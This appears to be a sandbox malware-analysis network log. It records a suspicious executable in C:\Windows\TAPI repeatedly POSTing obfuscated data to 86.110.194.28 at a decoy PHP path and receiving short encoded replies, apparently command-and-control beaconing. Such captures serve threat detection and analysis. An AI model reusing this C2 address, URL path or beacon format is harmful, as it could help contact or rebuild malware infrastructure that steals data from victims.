                                                                                                                                                                        Jan 3, 2025 07:58:28.891230106 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:29.247081995 CET2516OUTData Raw: 5b 50 5e 51 5d 5e 50 50 54 5b 59 5a 5b 5e 57 58 5f 51 5a 54 52 5d 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^Q]^PPT[YZ[^WX_QZTR]PCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>!:3&?/=(2^075%?!"* ^+09&<0W?#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:29.579876900 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:29.706604004 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:29 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        50192.168.2.44994086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:29.857238054 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:30.214934111 CET2516OUTData Raw: 5e 57 5e 5b 58 5c 55 5a 54 5b 59 5a 5b 5e 57 5c 5f 5c 5a 5e 52 51 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^W^[X\UZT[YZ[^W\_\Z^RQPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?."*<T%/*;=0&%P"*7(Z39?0?,R+9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:30.559382915 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:30.695372105 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:30 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        51192.168.2.44994886.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:30.905635118 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2512
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:31.261854887 CET2512OUTData Raw: 5e 55 5e 58 58 5b 50 5e 54 5b 59 5a 5b 57 57 58 5f 54 5a 55 52 53 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^U^XX[P^T[YZ[WWX_TZURSPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B+!\!*&,B>1'"1?69P#4'4E'//)9#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:58:31.582856894 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:31.710833073 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:31 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        52192.168.2.44995786.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:31.842695951 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:32.199467897 CET2516OUTData Raw: 5b 57 5e 5d 5d 5b 55 5b 54 5b 59 5a 5b 5e 57 5e 5f 56 5a 59 52 51 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [W^]][U[T[YZ[^W^_VZYRQPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C?Z":8% *;=$$-X%,*6!;737'8U()#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:32.531033039 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:32.658910990 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:32 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        53192.168.2.44996386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:32.780678988 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:33.136775970 CET2516OUTData Raw: 5b 53 5e 5c 58 59 50 50 54 5b 59 5a 5b 51 57 5e 5f 52 5a 55 52 53 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^\XYPPT[YZ[QW^_RZURSPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+--!)#&#>Z3!Y&)P5!U 8[$)&,3()#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:33.489886045 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:33.624320984 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:33 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        54192.168.2.44996986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:33.751686096 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:34.105530024 CET2516OUTData Raw: 5b 57 5e 5e 58 5c 50 59 54 5b 59 5a 5b 50 57 5a 5f 56 5a 5a 52 5c 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [W^^X\PYT[YZ[PWZ_VZZR\PHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?5!$V&/0@*-'&1Y>! ;#')@3'?9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:34.522464037 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        55192.168.2.44997586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:34.581729889 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:34.933629036 CET2108OUTData Raw: 5b 53 5e 5d 58 58 50 50 54 5b 59 5a 5b 55 57 52 5f 52 5a 5e 52 54 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^]XXPPT[YZ[UWR_RZ^RTPBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(."#2(A*].Z$&?2!U ')73/U+)#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:58:35.259982109 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:35.386782885 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:35 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 5b 26 05 29 00 29 3f 0e 06 32 0d 00 00 23 20 3b 06 2f 20 35 19 21 2c 25 12 26 3b 2c 56 3f 5b 21 1b 2b 33 39 57 21 3e 32 0b 3c 20 28 5d 03 10 3a 04 3c 13 0e 03 29 07 35 1b 2e 34 3b 5d 27 34 2b 01 29 0a 3a 08 27 2f 3e 55 35 3e 33 55 3d 0a 32 02 26 38 3f 07 3c 30 23 59 24 17 20 54 0b 17 27 56 27 09 27 1d 31 06 3a 04 3e 09 30 10 33 39 39 52 36 2c 31 0b 22 2a 27 02 2c 20 07 54 24 2b 35 11 2a 00 3c 0a 26 04 21 05 30 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $[&))?2# ;/ 5!,%&;,V?[!+39W!>2< (]:<)5.4;]'4+):'/>U5>3U=2&8?<0#Y$ T'V''1:>0399R6,1"*', T$+5*<&!0.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        56192.168.2.44997686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:34.705064058 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2512
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:35.058855057 CET2512OUTData Raw: 5e 52 5e 5a 5d 5e 50 5c 54 5b 59 5a 5b 57 57 5a 5f 54 5a 5c 52 52 50 45 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R^Z]^P\T[YZ[WWZ_TZ\RRPEZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<\"\;&<@=1'$"%Y!R $5Q 4Z%9(@0,+)#Y'$X.%
                                                                                                                                                                        Jan 3, 2025 07:58:35.395519018 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:35.522759914 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:35 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        57192.168.2.44998586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:35.660449982 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:36.012002945 CET2516OUTData Raw: 5e 55 5e 5d 5d 5d 50 5f 54 5b 59 5a 5b 56 57 5a 5f 53 5a 55 52 52 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^U^]]]P_T[YZ[VWZ_SZURRPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&A+X>!S$< @*;0$!%Q6-P#(0]$)+$Y3<9#Y'$X.%
                                                                                                                                                                        Jan 3, 2025 07:58:36.394627094 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:36.528743029 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:36 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        58192.168.2.44999386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:36.653472900 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:37.012168884 CET2516OUTData Raw: 5e 52 5e 5b 5d 59 50 5a 54 5b 59 5a 5b 54 57 58 5f 51 5a 5a 52 57 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R^[]YPZT[YZ[TWX_QZZRWPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+>!Z#9 W%,()2_'$%\%6"$!83<A$,0V?#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:58:37.352690935 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:37.491437912 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:37 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        59192.168.2.44999986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:37.628016949 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:37.980556011 CET2516OUTData Raw: 5b 54 5e 5d 58 5e 55 5c 54 5b 59 5a 5b 53 57 5c 5f 57 5a 5d 52 54 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^]X^U\T[YZ[SW\_WZ]RTPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?5^"9/&,B)-$4!Y',:"-P74X$ @3<<)#Y'$X.1
                                                                                                                                                                        Jan 3, 2025 07:58:38.333779097 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:38.468383074 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:38 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        60192.168.2.45000586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:38.596811056 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:38.949265957 CET2516OUTData Raw: 5e 56 5b 5a 58 58 50 50 54 5b 59 5a 5b 50 57 5a 5f 5c 5a 59 52 5c 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^V[ZXXPPT[YZ[PWZ_\ZYR\PAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D<.2" S$<+=("[$%]&?%"> 33_('/R)9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:39.295346022 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:39.425709009 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:39 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        61192.168.2.45001686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:39.554532051 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
